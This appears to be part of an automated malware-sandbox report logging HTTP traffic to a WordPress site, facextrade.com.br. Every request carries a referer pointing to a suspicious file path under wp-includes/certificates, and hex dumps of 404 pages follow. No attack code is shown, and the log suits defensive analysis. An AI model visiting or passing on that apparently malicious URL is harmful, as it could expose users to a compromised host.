Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/flags/16/pt-br.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/chart.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/images/content_bg4.jpg HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/switcher.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/arrow_down.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js?ver=2.2.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/images/up-arrow.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/custom-script.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-embed.min.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 09:53:17 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 09:53:21 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 09:53:21 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 09:53:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Content-Type: text/html; charset=UTF-8X-Varnish: 23797003Age: 0Via: 1.1 varnish-v4Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 30 30 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 